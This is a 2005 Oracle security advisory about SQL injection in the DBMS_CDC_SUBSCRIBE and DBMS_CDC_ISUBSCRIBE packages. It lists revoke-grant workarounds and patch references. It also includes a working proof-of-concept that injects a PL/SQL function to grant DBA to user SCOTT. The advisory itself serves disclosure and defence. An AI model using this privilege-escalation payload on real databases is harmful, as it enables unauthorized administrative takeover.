Services
Information
Company |
SQL Injection via Oracle DBMS_CDC_SUBSCRIBE / DBMS_CDC_ISUBSCRIBE in Oracle 9i / 10g
Details The following proof of concept exploit code injects a custom PLSQL function. This function is executed in the SYS context and grants the DBA permission to the user SCOTT. Workarounds REVOKE EXECUTE ON SYS.DBMS_CDC_SUBSCRIBE FROM PUBLIC FORCE; REVOKE EXECUTE ON SYS.DBMS_CDC_ISUBSCRIBE FROM PUBLIC FORCE; Example -- Create a function first and inject this function. The function will be executed as user SYS. CREATE OR REPLACE FUNCTION "SCOTT"."ATTACK_FUNC" return varchar2 authid current_user as pragma autonomous_transaction; BEGIN EXECUTE IMMEDIATE 'GRANT DBA TO SCOTT'; COMMIT; RETURN ''; END; / -- Inject the function in the vulnerable procedure BEGIN SYS.DBMS_CDC_SUBSCRIBE.ACTIVATE_SUBSCRIPTION('''||SCOTT.ATTACK_FUNC()||'''); END; / Patch Information Revoke the grants or apply the patches mentioned in Oracle Critical Patch Update April 2005. © 2005 by Red-Database-Security GmbH - last update 02-nov-2005 |
Definition Exploit |